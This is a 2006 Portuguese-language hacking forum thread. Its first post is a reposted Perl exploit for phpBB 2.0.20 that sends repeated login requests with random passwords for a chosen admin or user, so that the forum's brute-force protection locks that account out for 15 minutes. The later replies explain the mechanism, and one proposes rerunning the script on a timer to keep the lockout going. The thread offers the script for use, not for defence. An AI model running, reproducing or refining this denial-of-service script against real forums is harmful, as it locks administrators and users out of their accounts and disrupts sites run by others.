Title: [ phpBB 2.0.20 ] Disable Admin
Post by: DarkGenesis on 27 de June , 2006, 12:41:12 AM
Post by: DarkGenesis on 27 de June , 2006, 12:41:12 AM
Code Select
###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];
$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){
use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{
$password=rand();
$data = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length
$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;
}}* This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
Fonte: h4cky0u
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: #phobia on 27 de June , 2006, 11:37:40 AM
Post by: #phobia on 27 de June , 2006, 11:37:40 AM
Huahuahua, parece bem legal! hehe
Vou testar... =)
Vou testar... =)
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Security on 11 de July , 2006, 01:24:54 AM
Post by: Security on 11 de July , 2006, 01:24:54 AM
Esta Façanha Incapacita Admin Ou outro Usuário EM Foros de PHPBB Para 15 Min
ñ entendi mto..
que ele faz?
flw
ñ entendi mto..
que ele faz?
flw
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: DarkGenesis on 11 de July , 2006, 09:21:41 AM
Post by: DarkGenesis on 11 de July , 2006, 09:21:41 AM
Irá ficar incapaz de entrar no forum por um periodo de 15 mim.
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: branco on 11 de July , 2006, 01:19:15 PM
Post by: branco on 11 de July , 2006, 01:19:15 PM
creio que oque ele faz é fica logando no forum, assim a conta do cara vai ser suspendida por 15m
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Security on 15 de July , 2006, 11:45:12 AM
Post by: Security on 15 de July , 2006, 11:45:12 AM
+ só de admin moderador ñ né?
vlw
vlw
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: HadeS on 15 de July , 2006, 11:10:46 PM
Post by: HadeS on 15 de July , 2006, 11:10:46 PM
QUALQUER usuário.
HadeS
HadeS
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Anonymous on 16 de July , 2006, 03:27:14 AM
Post by: Anonymous on 16 de July , 2006, 03:27:14 AM
ele apenas faz tentativas mal sucedidas de logar com akele usuario
oq deixa suspenso o login do msmo por 30min
acho q saum preciso apenas 5 tentativas
oq deixa suspenso o login do msmo por 30min
acho q saum preciso apenas 5 tentativas
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: slul on 16 de July , 2006, 04:20:51 AM
Post by: slul on 16 de July , 2006, 04:20:51 AM
Quote from: "fuhrer"ele apenas faz tentativas mal sucedidas de logar com akele usuario
oq deixa suspenso o login do msmo por 30min
acho q saum preciso apenas 5 tentativas
sim e da pra otimizar o exploit tipo dando um microtime pra ele rodar de novo a cada 15 ou 30 minutos
nao sei da função microtime no perl
quem souber e quiser fazer tah aew a dica
acho q eh assim,
inteh